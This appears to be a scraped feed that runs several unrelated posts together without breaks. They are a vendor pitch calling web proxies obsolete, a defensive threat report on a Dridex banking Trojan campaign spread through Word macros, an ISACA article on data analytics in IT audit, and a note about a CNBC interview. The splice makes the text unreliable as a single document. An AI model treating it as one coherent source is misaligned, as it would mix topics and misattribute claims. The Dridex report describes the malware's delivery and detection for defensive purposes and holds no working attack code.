Once upon a time, proxies fulfilled a need traditional firewalls could not meet: visibility into web traffic starting with the categorization of HTTP, and later HTTPS, traffic. However, little to no emphasis was put on the vast number of applications utilizing other avenues of accessing corporate networks.
Proxy deployments today have outlived their usefulness and practicality. They have joined a long list of legacy security products that provide limited security capability against today’s advanced threats.
Download this whitepaper to find out more on the shortcomings of proxies, and how a next-generation security platform can provide faster, simpler and more comprehensive security.
In October, we called out a series of attacks installing the Dridex Trojan using macros in Microsoft Word documents. Those attacks continued over the last few months and in first two weeks of the new calendar year we’ve seen another new campaign.
To refresh your memory, Dridex is the latest version of the Bugat/Feodo/Cridex banking Trojan. Its core functionality is to steal credentials of online banking websites and allow a criminal to use those credentials to initiate transfers and steal funds. Dridex is currently being distributed through an e-mail campaign that carries a Word Document attachment, which uses built-in macro code to download and execute a copy of the Trojan.
While Dridex targets banks from all over the world, in October the majority of the e-mails we tracked were destined for the United States, with the United Kingdom coming in at a distant second place. This time around the UK comes out on top, with over one third of all attacks observed there.
This change in targeting is also clear in the themes used in each of the attacks. Many of the most-common attachment names refer to the BACS, or Bankers’ Automated Clearing Services, which is used for bank transfers in the UK. Another group of e-mails claimed to be an invoice from the Les Mills UK, a fitness organization. This campaign is likely preying on individuals who have made New Year’s resolutions to get fit in the UK.
In October we had identified just six URLs used by the Word documents to download the Dridex Trojan. In the past two weeks we’ve detected files using 43 different download locations.
Many of these URLs are hosted on compromised websites, but there is no clear pattern to indicate how they are taking control of the websites. However, there are clear groupings of patterns for the download URLs. One group relies on the path “/js/bin.exe” while another uses “mops/pops.php”. These URLs are encoded within the macros included in each file. If you are interested in extracting them, Rodel Mendrez from SpiderLabs wrote a short guide using Python. If you want to take the simpler route, Didier Steven’s OLE Dump tool has a plug-in that will automatically decode and extract these URLs, as shown below.
Palo Alto Networks WildFire detects all of these macro-based attacks using our sandbox technology. Others can protect themselves by disabling macros in Microsoft Word. Macro-based malware has been around for over well over a decade. Most organizations should disable them by default, enabling macros only for trusted files.
Although most would agree that internal audit is an assurance function, I like to think of internal auditors as value-added trusted advisors. A given mandate will provide assurance on processes that are functioning appropriately; however, the real value is in identifying areas of improvement that add tangible value back to the organisation. Data analytics has long been my tool of choice to help accomplish this value in an effective and efficient manner.
At ISACA’s 2015 North America Computer Audit, Control and Security (CACS) conference, I will be presenting alongside Bob Cuthbertson, COO of CaseWare IDEA Inc., on successful integration of data analytics within a risk-based IT audit universe. In a prelude to our session, I would like to provide examples from my own work in the past that I will be adding to, along with others, during the session on 16 March in Orlando, Florida.
Getting Started—Scoping the Audit Engagement
Understanding the business is the first and most crucial step in the audit process. It is what determines the amount of value you can potentially provide to key stakeholders. Shown in scenario 1 below, data analytics can be used before the audit begins as a status indicator of the risks facing an organization. And with this information, internal audit is able to improve the audit effectiveness as well, with the ultimate effort of providing value to the organisation.
Scenario 1: Driving the Audit Scope
Areas of Risk Identified:
Change Management
Project Management
Challenge: Time limitations allowed only one area of focus for the audit year. Solution: High-level analytics of change logs and project management databases uncovered significant internal development projects. Results: The System Development Life Cycle (SDLC) process was therefore identified as an area of immediate value to the organization.
Homing in on Insights Gained (Audit Execution)
To save time and resources, the use of data analytics in the planning phase helps develop greater understanding of where the hotspots are in terms of risk. Outlined in scenario 2 below, utilizing 100 percent of the available data enables internal audit to truly focus and identify anomalies within areas that have been identified as high risk.
Scenario 2: Testing Compliance
Mandate: Operational efficiency—IT help desk tickets
Challenge: More than 140,000 tickets were opened and closed during the year.
Solution: Use data analytics to identify trends to ensure the IT department meets the service level requirements—as delineated in the service level agreement (SLA).
Steps:
Obtain an extract from the ticket management system (Footprints). Confirm data completeness by verifying record count on screen (from the system) to the csv dump.
Execute a trend analysis based on tickets closed by employee, criticality and category type, amount of time from “Ticket Open date” to “Ticket Close date.”
Confirm compliance to SLA.
Results: The analytics showed that the IT group was in compliance with the agreed-upon SLA. Encouragingly, management was very interested in our data analysis, which led to the development of a dashboard for both operational efficiency (which was performed manually at the time by the director) and employee performance. The employee performance KPIs were then linked to their respective annual evaluations for a more objective evaluation of the core performance of the help desk employee.
Reporting Results
The insights found during the audit execution are what allow you to create a report that will provide value to the organization. They are the first step to providing a tangible root cause analysis and shedding light on the compliance and governance failures that matter most to companies.
The reporting phase is crucial when it comes to providing the added value for which we strive. If you have performed your audit effectively, the report will only include validated control deficiencies. The use of data analytics throughout the audit process should allow time to report on exact findings, highlight root causes and provide tangible recommendations. Furthermore, data analytics, namely data visualisation, can be used to convey high amounts of data and information in one image. I always remind myself that information is what the other party receives and not what I say. Therefore, the use of data visualisation to ensure the identified efficiencies make it across to the reader is yet another way in which data analytics helps me become the value-added trusted advisor I strive to be.
Conclusion
We have been using data analytics and attaining value by operating in a systematic and structured manner. We maximize our investment through these efficiencies and are able to provide stakeholders with the answers to questions before they even have them. This can and will continue to increase our value as internal auditors and trusted advisors to the business. During the session at North America CACS in March, I will be expanding on the processes behind these scenarios along with more examples using analytics tactics and visualisation methods. I hope to see you there!
Seren Dagdeviren will present “Building Momentum” at 2015 North America CACS in Orlando, Florida, USA, 16-18 March 2015. For information and to register, visit www.isaca.org/northamericacacs2015.
Today at Palo Alto Networks HQ we hosted the four co-founders of the Cyber Threat Alliance, which includes our own Mark McLaughlin, for a live discussion on CNBC’s Squawk Alley that was squarely focused on how collaboration between security companies is helping customers in the ongoing battle against cyberattackers. Mark and his fellow co-founders also touched on the latest cybersecurity legislation to come out of Washington.
Watch the full interview here, learn more about the Cyber Threat Alliance here and check out a few shots of the behind-the-scenes action at HQ this morning.
